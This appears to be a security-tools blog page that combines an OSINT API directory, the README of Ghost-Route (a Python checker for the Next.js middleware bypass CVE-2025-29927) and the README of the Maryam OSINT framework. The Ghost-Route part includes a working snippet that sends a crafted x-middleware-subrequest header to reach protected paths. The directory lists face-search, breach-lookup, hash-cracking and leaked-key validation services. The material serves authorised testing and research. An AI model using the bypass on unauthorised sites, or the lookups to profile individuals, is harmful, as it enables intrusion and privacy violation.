API-s-for-OSINT - List Of APIs For Gathering Information About Phone Numbers, Addresses, Domains, Etc.


APIs For OSINT

This is a collection of APIs that are useful for automating various OSINT tasks.

Thank you for following me! https://cybdetective.com


IoT/IP Search engines

| Name | Link | Description | Price |
|---|---|---|---|
| Shodan | https://developer.shodan.io | Search engine for Internet-connected hosts and devices | From $59/month |
| Netlas.io | https://netlas-api.readthedocs.io/en/latest/ | Search engine for Internet-connected hosts and devices. Read more at Netlas CookBook | Partly FREE |
| Fofa.so | https://fofa.so/static_pages/api_help | Search engine for Internet-connected hosts and devices | ??? |
| Censys.io | https://censys.io/api | Search engine for Internet-connected hosts and devices | Partly FREE |
| Hunter.how | https://hunter.how/search-api | Search engine for Internet-connected hosts and devices | Partly FREE |
| Fullhunt.io | https://api-docs.fullhunt.io/#introduction | Search engine for Internet-connected hosts and devices | Partly FREE |
| IPQuery.io | https://ipquery.io | API for IP information such as IP risk, geolocation data, and ASN details | FREE |
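Most of these services are plain REST endpoints, so a few lines of Python are enough to query them. As an illustration, a minimal sketch of a Shodan host lookup with the requests library (the helper name and placeholder key are mine; you need your own key from developer.shodan.io):

import requests

SHODAN_API_KEY = "YOUR_API_KEY"  # from https://developer.shodan.io

def shodan_host(ip):
    """Look up the open ports and banners Shodan has indexed for an IP."""
    resp = requests.get(
        f"https://api.shodan.io/shodan/host/{ip}",
        params={"key": SHODAN_API_KEY},
        timeout=30,
    )
    resp.raise_for_status()
    return resp.json()

host = shodan_host("8.8.8.8")
print(host.get("org"), host.get("ports"))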

Universal OSINT APIs

| Name | Link | Description | Price |
|---|---|---|---|
| Social Links | https://sociallinks.io/products/sl-api | Email info lookup, phone info lookup, individual and company profiling, social media tracking, dark web monitoring, and more. A code example of using this API for face search is in this repo | PAID, price per request |

Phone Number Lookup and Verification

| Name | Link | Description | Price |
|---|---|---|---|
| Numverify | https://numverify.com | Global phone number validation and lookup JSON API. Supports 232 countries | 250 requests FREE |
| Twilio | https://www.twilio.com/docs/lookup/api | Retrieve additional information about a phone number | Free, or $0.01 per request for caller lookup |
| Plivo | https://www.plivo.com/lookup/ | Determine carrier, number type, format, and country for any phone number worldwide | From $0.04 per request |
| GetContact | https://github.com/kovinevmv/getcontact | Find info about a user by phone number | From $6.89/month for 100 requests |
| Veriphone | https://veriphone.io/ | Phone number validation and carrier lookup | 1,000 requests/month FREE |
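For example, Numverify's validate endpoint takes the number as a query parameter. A hedged sketch (the access_key placeholder and helper are illustrative; the free tier uses plain HTTP):

import requests

NUMVERIFY_KEY = "YOUR_ACCESS_KEY"  # free-tier key from numverify.com

def validate_number(number):
    """Validate a phone number and return carrier/line-type details."""
    resp = requests.get(
        "http://apilayer.net/api/validate",  # free plan is HTTP-only
        params={"access_key": NUMVERIFY_KEY, "number": number},
        timeout=30,
    )
    resp.raise_for_status()
    return resp.json()  # fields include valid, country_name, carrier, line_type

print(validate_number("14158586273"))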

Address/ZIP codes lookup

| Name | Link | Description | Price |
|---|---|---|---|
| Global Address | https://rapidapi.com/adminMelissa/api/global-address/ | Easily verify, check, or look up addresses | FREE |
| US Street Address | https://smartystreets.com/docs/cloud/us-street-api | Validate and append data for any US postal address | FREE |
| Google Maps Geocoding API | https://developers.google.com/maps/documentation/geocoding/overview | Convert addresses (like "1600 Amphitheatre Parkway, Mountain View, CA") into geographic coordinates | $0.005 per request |
| Postcoder | https://postcoder.com/address-lookup | Find addresses by postcode | £130 per 5,000 requests |
| Zipcodebase | https://zipcodebase.com | Look up postal codes, calculate distances, and much more | 5,000 requests FREE |
| OpenWeatherMap Geocoding API | https://openweathermap.org/api/geocoding-api | Get geographic coordinates (lat, lon) from the name of a location (city or area name) | 60 calls/minute, 1,000,000 calls/month FREE |
| DistanceMatrix | https://distancematrix.ai/product | Calculate, evaluate, and plan your routes | $1.25-$2 per 1,000 elements |
| Geotagging API | https://geotagging.ai/ | Predict geolocations from text | Freemium |

People and documents verification

| Name | Link | Description | Price |
|---|---|---|---|
| Appruve | https://appruve.co | Verify the identities of individuals and businesses, and connect to financial account data across Africa | Paid |
| Onfido | https://onfido.com | Onfido Document Verification lets your users scan a photo ID from any device before checking that it is genuine. Combined with Biometric Verification, it is a seamless way to anchor an account to the real identity of a customer | Paid |
| Surepass | https://surepass.io/passport-id-verification-api/ | Passport, photo ID, and driver's license verification in India | Paid |

Business/Entity search

| Name | Link | Description | Price |
|---|---|---|---|
| OpenCorporates | https://api.opencorporates.com | Company information | Paid, price upon request |
| LinkedIn Company Search API | https://docs.microsoft.com/en-us/linkedin/marketing/integrations/community-management/organizations/company-search?context=linkedin%2Fcompliance%2Fcontext&tabs=http | Find companies using keywords, industry, location, and other criteria | FREE |
| Mattermark | https://rapidapi.com/raygorodskij/api/Mattermark/ | Get company and investor information | Free 14-day trial, from $49/month |

Domain/DNS/IP lookup

| Name | Link | Description | Price |
|---|---|---|---|
| API OSINT DS | https://github.com/davidonzo/apiosintDS | Collect info about IPv4s/FQDNs/URLs and file hashes (MD5, SHA1, or SHA256) | FREE |
| InfoDB API | https://www.ipinfodb.com/api | Returns the location of an IP address (country, region, city, ZIP code, latitude, longitude) and the associated time zone in XML, JSON, or plain-text format | FREE |
| Domainsdb.info | https://domainsdb.info | Registered domain name search | FREE |
| BGPView | https://bgpview.docs.apiary.io/# | View all sorts of analytics data about the current state and structure of the internet | FREE |
| DNSCheck | https://www.dnscheck.co/api | Monitor the status of both individual DNS records and groups of related DNS records | Up to 10 DNS records FREE |
| Cloudflare Trace | https://github.com/fawazahmed0/cloudflare-trace-api | Get IP address, timestamp, user agent, country code, IATA, HTTP version, TLS/SSL version, and more | FREE |
| Host.io | https://host.io/ | Get info about a domain | FREE |

Mobile Apps Endpoints

| Name | Link | Description | Price |
|---|---|---|---|
| BeVigil OSINT API | https://bevigil.com/osint-api | Access to millions of asset footprint data points, including domain intel, cloud services, API information, and third-party assets extracted from millions of mobile apps continuously uploaded and scanned by users on bevigil.com | 50 credits FREE / $50 per 1,000 credits |

Scraping

| Name | Link | Description | Price |
|---|---|---|---|
| WebScraping.AI | https://webscraping.ai/ | Web scraping API with built-in proxies and JS rendering | FREE |
| ZenRows | https://www.zenrows.com/ | Web scraping API that bypasses anti-bot solutions while offering JS rendering and rotating proxies | FREE |

Whois

| Name | Link | Description | Price |
|---|---|---|---|
| WhoisFreaks | https://whoisfreaks.com/ | Well-parsed and structured domain WHOIS data for all domain names, registrars, countries, and TLDs since the birth of the internet | $19 per 5,000 requests |
| WhoisXMLApi | https://whois.whoisxmlapi.com | Gathers a variety of domain ownership and registration data points from a comprehensive WHOIS database | 500 requests/month FREE |
| IP2WHOIS | https://www.ip2whois.com/developers-api | Get detailed info about a domain | 500 requests/month FREE |

GEO IP

| Name | Link | Description | Price |
|---|---|---|---|
| Ipstack | https://ipstack.com | Detect country, region, city, and ZIP code | FREE |
| Ipgeolocation.io | https://ipgeolocation.io | Provides country, city, state, province, local currency, latitude and longitude, company detail, ISP lookup, language, ZIP code, country calling code, time zone, current time, sunset and sunrise time, moonset and moonrise | 30,000 requests/month FREE |
| IPInfoDB | https://ipinfodb.com/api | Free geolocation tools and APIs for country, region, city, and time zone lookup by IP address | FREE |
| IP API | https://ip-api.com/ | Free domain/IP geolocation info | FREE |
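ip-api.com needs no key for non-commercial use, which makes it a quick first stop. A minimal sketch:

import requests

def geolocate(ip):
    """Geolocate an IP with the free (non-commercial) ip-api.com endpoint."""
    resp = requests.get(f"http://ip-api.com/json/{ip}", timeout=30)
    resp.raise_for_status()
    return resp.json()  # status, country, regionName, city, isp, lat, lon, ...

info = geolocate("8.8.8.8")
print(info["country"], info["city"], info["isp"])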

Wi-Fi lookup

| Name | Link | Description | Price |
|---|---|---|---|
| Mylnikov API | https://www.mylnikov.org | Public API implementation of a Wi-Fi geolocation database | FREE |
| Wigle | https://api.wigle.net/ | Get location and other information by SSID | FREE |

Network

| Name | Link | Description | Price |
|---|---|---|---|
| PeeringDB | https://www.peeringdb.com/apidocs/ | Database of networks and the go-to location for interconnection data | FREE |
| PacketTotal | https://packettotal.com/api.html | Analyze .pcap files | FREE |

Finance

| Name | Link | Description | Price |
|---|---|---|---|
| Binlist.net | https://binlist.net/ | Get information about a bank by BIN | FREE |
| FDIC Bank Data API | https://banks.data.fdic.gov/docs/ | Institutions, locations, and history events | FREE |
| Amdoren | https://www.amdoren.com/currency-api/ | Free currency API with over 150 currencies | FREE |
| VATComply.com | https://www.vatcomply.com/documentation | Exchange rates, geolocation, and VAT number validation | FREE |
| Alpaca | https://alpaca.markets/docs/api-documentation/api-v2/market-data/alpaca-data-api-v2/ | Real-time and historical market data on all US equities and ETFs | FREE |
| Swiftcodesapi | https://swiftcodesapi.com | Verify the validity of a bank SWIFT code or IBAN account number | $39/month for 4,000 SWIFT lookups |
| IBANAPI | https://ibanapi.com | Validate an IBAN number and get bank account information from it | Freemium, $10 Starter plan |

Email

| Name | Link | Description | Price |
|---|---|---|---|
| EVA | https://eva.pingutil.com/ | Measure email deliverability and quality | FREE |
| Mailboxlayer | https://mailboxlayer.com/ | Simple REST API measuring email deliverability and quality | 100 requests FREE, $14.49 for 5,000 requests/month |
| EmailCrawlr | https://emailcrawlr.com/ | Get key information about company websites. Find all email addresses associated with a domain. Get social accounts associated with an email. Verify email address deliverability | 200 requests FREE, $40 for 5,000 requests |
| Voila Norbert | https://www.voilanorbert.com/api/ | Find anyone's email address and ensure your emails reach real people | From $49/month |
| Kickbox | https://open.kickbox.com/ | Email verification API | FREE |
| FachaAPI | https://api.facha.dev/ | Check whether an email domain is a temporary (disposable) email domain | FREE |

Names/Surnames

| Name | Link | Description | Price |
|---|---|---|---|
| Genderize.io | https://genderize.io | Estimates how likely a given name is to be male or female and shows the popularity of the name | 1,000 names/day FREE |
| Agify.io | https://agify.io | Predicts the age of a person given their name | 1,000 names/day FREE |
| Nationalize.io | https://nationalize.io | Predicts the nationality of a person given their name | 1,000 names/day FREE |
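All three services share the same query pattern, so one helper covers them. A small sketch (the predict wrapper is my own illustration, not an official client):

import requests

def predict(name):
    """Query the three demographic-prediction APIs for one name."""
    out = {}
    for api in ("genderize", "agify", "nationalize"):
        resp = requests.get(f"https://api.{api}.io/", params={"name": name}, timeout=30)
        resp.raise_for_status()
        out[api] = resp.json()
    return out

print(predict("peter"))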

Pastebin/Leaks

| Name | Link | Description | Price |
|---|---|---|---|
| HaveIBeenPwned | https://haveibeenpwned.com/API/v3 | List pwned accounts (email addresses and usernames) | $3.50/month |
| Psbdmp.ws | https://psbdmp.ws/api | Search in Pastebin | $9.95 per 10,000 requests |
| LeakPeek | https://psbdmp.ws/api | Search in leak databases | $9.99 per 4 weeks, unlimited access |
| BreachDirectory.com | https://breachdirectory.com/api_documentation | Search a domain in data breach databases | FREE |
| LeakLookup | https://leak-lookup.com/api | Search domain, email address, full name, IP address, phone, password, or username in leak databases | 10 requests FREE |
| BreachDirectory.org | https://rapidapi.com/rohan-patra/api/breachdirectory/pricing | Search domain, email address, full name, IP address, phone, password, or username in leak databases (password hashes viewable) | 50 requests/month FREE |
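For HaveIBeenPwned, v3 of the API requires an API-key header and a user agent, and a 404 simply means the account appears in no known breach. A hedged sketch:

import requests

HIBP_API_KEY = "YOUR_API_KEY"  # purchased via haveibeenpwned.com

def breaches_for(account):
    """List breaches for an email address via the HIBP v3 API."""
    resp = requests.get(
        f"https://haveibeenpwned.com/api/v3/breachedaccount/{account}",
        headers={"hibp-api-key": HIBP_API_KEY, "user-agent": "osint-demo"},
        timeout=30,
    )
    if resp.status_code == 404:
        return []  # account not found in any breach
    resp.raise_for_status()
    return resp.json()

print([b["Name"] for b in breaches_for("test@example.com")])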

Archives

| Name | Link | Description | Price |
|---|---|---|---|
| Wayback Machine API (Memento API, CDX Server API, Wayback Availability JSON API) | https://archive.org/help/wayback_api.php | Retrieve information about Wayback capture data | FREE |
| TROVE (Australian Web Archive) API | https://trove.nla.gov.au/about/create-something/using-api | Retrieve information about TROVE capture data | FREE |
| Archive-It API | https://support.archive-it.org/hc/en-us/articles/115001790023-Access-Archive-It-s-Wayback-index-with-the-CDX-C-API | Retrieve information about Archive-It capture data | FREE |
| UK Web Archive API | https://ukwa-manage.readthedocs.io/en/latest/#api-reference | Retrieve information about UK Web Archive capture data | FREE |
| Arquivo.pt API | https://github.com/arquivo/pwa-technologies/wiki/Arquivo.pt-API | Full-text search and access to preserved web content and related metadata. It is also possible to search by URL, accessing all versions of preserved web content. Returns a JSON object | FREE |
| Library of Congress Archive API | https://www.loc.gov/apis/ | Provides structured data about Library of Congress collections | FREE |
| BotsArchive | https://botsarchive.com/docs.html | JSON-formatted details about Telegram bots available in the database | FREE |
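The Wayback Availability JSON API is the simplest of these to script against. A minimal sketch:

import requests

def latest_snapshot(url):
    """Return the most recent Wayback Machine snapshot URL, if any."""
    resp = requests.get(
        "https://archive.org/wayback/available", params={"url": url}, timeout=30
    )
    resp.raise_for_status()
    snap = resp.json().get("archived_snapshots", {}).get("closest")
    return snap["url"] if snap else None

print(latest_snapshot("cybdetective.com"))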

Hashes decrypt/encrypt

| Name | Link | Description | Price |
|---|---|---|---|
| MD5 Decrypt | https://md5decrypt.net/en/Api/ | Search for decrypted hashes in the database | €1.99/day |

Crypto

| Name | Link | Description | Price |
|---|---|---|---|
| BTC.com | https://btc.com/btc/adapter?type=api-doc | Get information about addresses and transactions | FREE |
| Blockchair | https://blockchair.com | Explore data stored on 17 blockchains (BTC, ETH, Cardano, Ripple, etc.) | $0.33-$1 per 1,000 calls |
| BitcoinAbuse | https://www.bitcoinabuse.com/api-docs | Look up Bitcoin addresses that have been linked to criminal activity | FREE |
| Bitcoinwhoswho | https://www.bitcoinwhoswho.com/api | Scam reports on Bitcoin addresses | FREE |
| Etherscan | https://etherscan.io/apis | Ethereum explorer API | FREE |
| apilayer coinlayer | https://coinlayer.com | Real-time cryptocurrency exchange rates | FREE |
| BlockFacts | https://blockfacts.io/ | Real-time crypto data from multiple exchanges via a single unified API, and much more | FREE |
| Brave NewCoin | https://bravenewcoin.com/developers | Real-time and historical crypto data from more than 200 exchanges | FREE |
| WorldCoinIndex | https://www.worldcoinindex.com/apiservice | Cryptocurrency prices | FREE |
| WalletLabels | https://www.walletlabels.xyz/docs | Labels for 7.5 million Ethereum wallets | FREE |

Malware

| Name | Link | Description | Price |
|---|---|---|---|
| VirusTotal | https://developers.virustotal.com/reference | Analyze files and URLs | Public API is FREE |
| AbuseIPDB | https://docs.abuseipdb.com/#introduction | IP/domain/URL reputation | FREE |
| AlienVault Open Threat Exchange (OTX) | https://otx.alienvault.com/api | IP/domain/URL reputation | FREE |
| Phisherman | https://phisherman.gg | IP/domain/URL reputation | FREE |
| URLScan.io | https://urlscan.io/about-api/ | Scan and analyze URLs | FREE |
| Web of Trust | https://support.mywot.com/hc/en-us/sections/360004477734-API- | IP/domain/URL reputation | FREE |
| Threat Jammer | https://threatjammer.com/docs/introduction-threat-jammer-user-api | IP/domain/URL reputation | ??? |

Face Search

| Name | Link | Description | Price |
|---|---|---|---|
| Search4faces | https://search4faces.com/api.html | Search for people in social networks by facial image | $21 per 1,000 requests |

Face Detection

| Name | Link | Description | Price |
|---|---|---|---|
| Face++ | https://www.faceplusplus.com/face-detection/ | Detect and locate human faces within an image and return high-precision face bounding boxes. Face++ also allows you to store metadata of each detected face for future use | From $0.03 per call |
| BetaFace | https://www.betafaceapi.com/wpa/ | Can scan uploaded image files or image URLs, find faces, and analyze them. The API also provides verification (face comparison) and identification (face search) services, and can maintain multiple user-defined recognition databases (namespaces) | 50 images/day FREE, from €0.15 per request |

Reverse Image Search

| Name | Link | Description | Price |
|---|---|---|---|
| Google Reverse Image Search API | https://github.com/SOME-1HING/google-reverse-image-api/ | A simple API built using Node.js and Express.js that lets you perform a Google reverse image search by providing an image URL | FREE (unofficial) |
| TinEyeAPI | https://services.tineye.com/TinEyeAPI | Verify images, moderate user-generated content, track images and brands, check copyright compliance, deploy fraud detection solutions, identify stock photos, confirm the uniqueness of an image | From $200 per 5,000 searches |
| Bing Image Search API | https://www.microsoft.com/en-us/bing/apis/bing-image-search-api | With Bing Image Search API v7, help users scour the web for images. Results include thumbnails, full image URLs, publishing website info, image metadata, and more | 1,000 requests/month FREE |
| MRISA | https://github.com/vivithemage/mrisa | MRISA (Meta Reverse Image Search API) is a RESTful API that takes an image URL, does a reverse Google image search, and returns a JSON array with the search results | FREE (unofficial) |
| PicImageSearch | https://github.com/kitUIN/PicImageSearch | Aggregator for different reverse image search APIs | FREE (unofficial) |

AI Geolocation

| Name | Link | Description | Price |
|---|---|---|---|
| Geospy | https://api.geospy.ai/ | Estimate the location of an uploaded photo | Access by request |
| Picarta | https://picarta.ai/api | Estimate the location of an uploaded photo | 100 requests/day FREE |

Social Media and Messengers

| Name | Link | Description | Price |
|---|---|---|---|
| Twitch | https://dev.twitch.tv/docs/v5/reference | | |
| YouTube Data API | https://developers.google.com/youtube/v3 | | |
| Reddit | https://www.reddit.com/dev/api/ | | |
| Vkontakte | https://vk.com/dev/methods | | |
| Twitter API | https://developer.twitter.com/en | | |
| Linkedin API | https://docs.microsoft.com/en-us/linkedin/ | | |
| All Facebook and Instagram APIs | https://developers.facebook.com/docs/ | | |
| Whatsapp Business API | https://www.whatsapp.com/business/api | | |
| Telegram and Telegram Bot API | https://core.telegram.org | | |
| Weibo API | https://open.weibo.com/wiki/API文档/en | | |
| XING | https://dev.xing.com/partners/job_integration/api_docs | | |
| Viber | https://developers.viber.com/docs/api/rest-bot-api/ | | |
| Discord | https://discord.com/developers/docs | | |
| Odnoklassniki | https://ok.ru/apiok | | |
| Blogger | https://developers.google.com/blogger/ | The Blogger APIs allow client applications to view and update Blogger content | FREE |
| Disqus | https://disqus.com/api/docs/auth/ | Communicate with Disqus data | FREE |
| Foursquare | https://developer.foursquare.com/ | Interact with Foursquare users and places (geolocation-based check-ins, photos, tips, events, etc.) | FREE |
| HackerNews | https://github.com/HackerNews/API | Social news for CS and entrepreneurship | FREE |
| Kakao | https://developers.kakao.com/ | Kakao Login, Share on KakaoTalk, social plugins, and more | FREE |
| Line | https://developers.line.biz/ | Line Login, Share on Line, social plugins, and more | FREE |
| TikTok | https://developers.tiktok.com/doc/login-kit-web | Fetches user info and a user's video posts on the TikTok platform | FREE |
| Tumblr | https://www.tumblr.com/docs/en/api/v2 | Read and write Tumblr data | FREE |

UNOFFICIAL APIs

[!WARNING] Use with caution! Accounts may be blocked permanently for using unofficial APIs.

| Name | Link | Description | Price |
|---|---|---|---|
| TikTok | https://github.com/davidteather/TikTok-Api | The unofficial TikTok API wrapper in Python | FREE |
| Google Trends | https://github.com/suryasev/unofficial-google-trends-api | Unofficial Google Trends API | FREE |
| YouTube Music | https://github.com/sigma67/ytmusicapi | Unofficial API for YouTube Music | FREE |
| Duolingo | https://github.com/KartikTalwar/Duolingo | Unofficial Duolingo API (can gather info about users) | FREE |
| Steam | https://github.com/smiley/steamapi | An unofficial object-oriented Python library for accessing the Steam Web API | FREE |
| Instagram | https://github.com/ping/instagram_private_api | Instagram private API | FREE |
| Discord | https://github.com/discordjs/discord.js | JavaScript library for interacting with the Discord API | FREE |
| Zhihu | https://github.com/syaning/zhihu-api | Unofficial API for Zhihu | FREE |
| Quora | https://github.com/csu/quora-api | Unofficial API for Quora | FREE |
| DNSDumpster | https://github.com/PaulSec/API-dnsdumpster.com | Unofficial Python API for DNSDumpster | FREE |
| PornHub | https://github.com/sskender/pornhub-api | Unofficial API for PornHub in Python | FREE |
| Skype | https://github.com/ShyykoSerhiy/skyweb | Unofficial Skype API for Node.js via the 'Skype (HTTP)' protocol | FREE |
| Google Search | https://github.com/aviaryan/python-gsearch | Unofficial Google Search API for Python with no external dependencies | FREE |
| Airbnb | https://github.com/nderkach/airbnb-python | Python wrapper around the Airbnb API (unofficial) | FREE |
| Medium | https://github.com/enginebai/PyMedium | Unofficial Medium Python Flask API and SDK | FREE |
| Facebook | https://github.com/davidyen1124/Facebot | Powerful unofficial Facebook API | FREE |
| Linkedin | https://github.com/tomquirk/linkedin-api | Unofficial Linkedin API for Python | FREE |
| Y2mate | https://github.com/Simatwa/y2mate-api | Unofficial Y2mate API for Python | FREE |
| Livescore | https://github.com/Simatwa/livescore-api | Unofficial Livescore API for Python | FREE |

Search Engines

| Name | Link | Description | Price |
|---|---|---|---|
| Google Custom Search JSON API | https://developers.google.com/custom-search/v1/overview | Search in Google | 100 requests FREE |
| Serpstack | https://serpstack.com/ | Google search results as JSON | FREE |
| Serpapi | https://serpapi.com | Google, Baidu, Yandex, Yahoo, DuckDuckGo, Bing, and many other search results | $50 per 5,000 searches/month |
| Bing Web Search API | https://www.microsoft.com/en-us/bing/apis/bing-web-search-api | Search in Bing (plus instant answers and location) | 1,000 transactions/month FREE |
| WolframAlpha API | https://products.wolframalpha.com/api/pricing/ | Short answers, conversations, calculators, and much more | From $25 per 1,000 queries |
| DuckDuckGo Instant Answers API | https://duckduckgo.com/api | An API for some Instant Answers, not for full search results | FREE |
| Memex Marginalia | https://memex.marginalia.nu/projects/edge/api.gmi | API for a new privacy-focused search engine | FREE |
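As an example of scripting one of these, the Custom Search JSON API takes an API key plus a Programmable Search Engine ID (both placeholders below are yours to fill in). A minimal sketch:

import requests

GOOGLE_API_KEY = "YOUR_API_KEY"   # from the Google Cloud console
SEARCH_ENGINE_ID = "YOUR_CX_ID"   # Programmable Search Engine ID

def google_search(query):
    """Return (title, link) pairs from the Custom Search JSON API."""
    resp = requests.get(
        "https://www.googleapis.com/customsearch/v1",
        params={"key": GOOGLE_API_KEY, "cx": SEARCH_ENGINE_ID, "q": query},
        timeout=30,
    )
    resp.raise_for_status()
    return [(i["title"], i["link"]) for i in resp.json().get("items", [])]

print(google_search("osint api"))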

News analysis

| Name | Link | Description | Price |
|---|---|---|---|
| MediaStack | https://mediastack.com/ | News article search results in JSON | 500 requests/month FREE |

Darknet

| Name | Link | Description | Price |
|---|---|---|---|
| Darksearch.io | https://darksearch.io/apidoc | Search websites in the .onion zone | FREE |
| Onion Lookup | https://onion.ail-project.org/ | onion-lookup is a service for checking the existence of Tor hidden services and retrieving their associated metadata. It relies on a private AIL instance to obtain the metadata | FREE |

Torrents/file sharing

| Name | Link | Description | Price |
|---|---|---|---|
| Jackett | https://github.com/Jackett/Jackett | API for automated searching across different torrent trackers | FREE |
| Torrents API PY | https://github.com/Jackett/Jackett | Unofficial API for 1337x, Piratebay, Nyaasi, Torlock, Torrent Galaxy, Zooqle, Kickass, Bitsearch, MagnetDL, Libgen, YTS, Limetorrent, TorrentFunk, Glodls, Torre | FREE |
| Torrent Search API | https://github.com/Jackett/Jackett | API for a torrent search engine with Extratorrents, Piratebay, and ISOhunt | 500 queries/day FREE |
| Torrent search api | https://github.com/JimmyLaurent/torrent-search-api | Yet another Node torrent scraper (supports iptorrents, torrentleech, torrent9, torrentz2, 1337x, thepiratebay, Yggtorrent, TorrentProject, Eztv, Yts, LimeTorrents) | FREE |
| Torrentinim | https://github.com/sergiotapia/torrentinim | Very low memory-footprint, self-hosted, API-only torrent search engine. Sonarr + Radarr compatible, native support for Linux, Mac, and Windows | FREE |

Vulnerabilities

| Name | Link | Description | Price |
|---|---|---|---|
| National Vulnerability Database CVE Search API | https://nvd.nist.gov/developers/vulnerabilities | Get basic information about a CVE and its history | FREE |
| OpenCVE API | https://docs.opencve.io/api/cve/ | Get basic information about a CVE | FREE |
| CVEDetails API | https://www.cvedetails.com/documentation/apis | Get basic information about a CVE | Partly FREE (?) |
| CVESearch API | https://docs.cvesearch.com/ | Get basic information about a CVE | By request |
| KEVin API | https://kevin.gtfkd.com/ | API for accessing CISA's Known Exploited Vulnerabilities (KEV) catalog and CVE data | FREE |
| Vulners.com API | https://vulners.com | Get basic information about a CVE | FREE for personal use |

Flights

| Name | Link | Description | Price |
|---|---|---|---|
| Aviation Stack | https://aviationstack.com | Get information about flights, aircraft, and airlines | FREE |
| OpenSky Network | https://opensky-network.org/apidoc/index.html | Free real-time ADS-B aviation data | FREE |
| AviationAPI | https://docs.aviationapi.com/ | FAA aeronautical charts and publications, airport information, and airport weather | FREE |
| FachaAPI | https://api.facha.dev | Aircraft details and live positioning API | FREE |

Webcams

| Name | Link | Description | Price |
|---|---|---|---|
| Windy Webcams API | https://api.windy.com/webcams/docs | Get a list of available webcams for a country, city, or geographic coordinates | FREE with limits, or €9,990 without limits |

Regex

| Name | Link | Description | Price |
|---|---|---|---|
| Autoregex | https://autoregex.notion.site/AutoRegex-API-Documentation-97256bad2c114a6db0c5822860214d3a | Convert English phrases to regular expressions | From $3.49/month |

API testing tools

| Name | Link |
|---|---|
| API Guessr (detect API by auth key or token) | https://api-guesser.netlify.app/ |
| REQBIN Online REST & SOAP API Testing Tool | https://reqbin.com |
| ExtendsClass Online REST Client | https://extendsclass.com/rest-client-online.html |
| Codebeautify.org Online API Test | https://codebeautify.org/api-test |
| SyncWith Google Sheets add-on; link more than 1,000 APIs with a spreadsheet | https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget |
| Talend API Tester Google Chrome extension | https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget |
| Michael Bazzell's API search tools | https://inteltechniques.com/tools/API.html |

Curl converters (tools that help write code from API queries)

| Name | Link |
|---|---|
| Convert curl commands to Python, JavaScript, PHP, R, Go, C#, Ruby, Rust, Elixir, Java, MATLAB, Dart, CFML, Ansible URI, or JSON | https://curlconverter.com |
| Curl-to-PHP: instantly convert curl commands to PHP code | https://incarnate.github.io/curl-to-php/ |
| Curl to PHP online (Codebeautify) | https://codebeautify.org/curl-to-php-online |
| Curl to JavaScript fetch | https://kigiri.github.io/fetch/ |
| Curl to JavaScript fetch (Scrapingbee) | https://www.scrapingbee.com/curl-converter/javascript-fetch/ |
| Curl to C# converter | https://curl.olsh.me |

Create your own API

| Name | Link |
|---|---|
| Sheety: create an API from a Google Sheet | https://sheety.co/ |
| Postman: platform for creating your own API | https://www.postman.com |
| Retool: REST API generator | https://retool.com/api-generator/ |
| Beeceptor: REST API mocking and intercepting in seconds (no coding) | https://beeceptor.com |

Distribute your own API

| Name | Link |
|---|---|
| RapidAPI: market your API to millions of developers | https://rapidapi.com/solution/api-provider/ |
| Apilayer: API marketplace | https://apilayer.com |

API Keys Info

| Name | Link | Description |
|---|---|---|
| Keyhacks | https://github.com/streaak/keyhacks | A repository showing quick ways to check whether API keys leaked by a bug bounty program are still valid |
| All about APIKey | https://github.com/daffainfo/all-about-apikey | Detailed information about API keys / OAuth tokens for different services (description, request, response, regex, example) |
| API Guessr | https://api-guesser.netlify.app/ | Enter an API key and find out which service it belongs to |

API directories

If you don't find what you need, try searching these directories.

| Name | Link |
|---|---|
| APIDOG ApiHub | https://apidog.com/apihub/ |
| Rapid APIs collection | https://rapidapi.com/collections |
| API Ninjas | https://api-ninjas.com/api |
| APIs Guru | https://apis.guru/ |
| APIs List | https://apislist.com/ |
| API Context Directory | https://apicontext.com/api-directory/ |
| Any API | https://any-api.com/ |
| Public APIs Github repo | https://github.com/public-apis/public-apis |

How to learn to work with REST APIs?

If you don't know how to work with REST APIs, I recommend the Netlas API guide I wrote for Netlas.io:

Netlas Cookbook

It briefly and accessibly explains how to automate requests in different programming languages (with a focus on Python and Bash) and how to process the resulting JSON data.

    Thank you for following me! https://cybdetective.com




Ghost-Route - Ghost Route Detects If A Next.js Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)



A Python script to check Next.js sites for the corrupt middleware vulnerability (CVE-2025-29927).

The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by sending a custom x-middleware-subrequest header.

Next.js versions affected: 11.1.4 and up

    [!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.
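Conceptually, the check boils down to requesting a protected path twice, once bare and once with the magic header, and comparing the responses. A minimal sketch of the idea (my illustration, not this tool's actual code; the repeated middleware value mirrors the public PoC for CVE-2025-29927 and may need adjusting per target):

import requests

# Public PoC value: repeat the middleware name enough times to exceed
# Next.js's recursion-depth limit so the middleware is skipped entirely.
BYPASS = {"x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"}

def check(base_url, path="/admin"):
    url = base_url.rstrip("/") + path
    normal = requests.get(url, timeout=15, allow_redirects=False)
    bypass = requests.get(url, headers=BYPASS, timeout=15, allow_redirects=False)
    # If the bare request is blocked or redirected but the header yields a 200,
    # the middleware was likely bypassed.
    return normal.status_code in (301, 302, 307, 401, 403) and bypass.status_code == 200

print(check("https://example.com"))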


    Installation

    Clone the repo

    git clone https://github.com/takumade/ghost-route.git
    cd ghost-route

    Create and activate virtual environment

    python -m venv .venv
    source .venv/bin/activate

    Install dependencies

    pip install -r requirements.txt

    Usage

    python ghost-route.py <url> <path> <show_headers>
    • <url>: Base URL of the Next.js site (e.g., https://example.com)
    • <path>: Protected path to test (default: /admin)
    • <show_headers>: Show response headers (default: False)

    Example

    Basic Example

    python ghost-route.py https://example.com /admin

    Show Response Headers

    python ghost-route.py https://example.com /admin True

    License

    MIT License

    Credits



Maryam - Open-Source Intelligence (OSINT) Framework



    OWASP Maryam is a modular open-source framework based on OSINT and data gathering. It is designed to provide a robust environment to harvest data from open sources and search engines quickly and thoroughly.


    Installation

    Supported OS

    • Linux
    • FreeBSD
    • Darwin
    • OSX
    $ pip install maryam

    Alternatively, you can install the latest version with the following command (Recommended):

    pip install git+https://github.com/saeeddhqan/maryam.git

    Usage

# Using dns_search. --max means use all resources. --api shows the results as JSON.
# -t means use multi-threading.
    maryam -e dns_search -d ibm.com -t 5 --max --api --form
    # Using youtube. -q means query
    maryam -e youtube -q "<QUERY>"
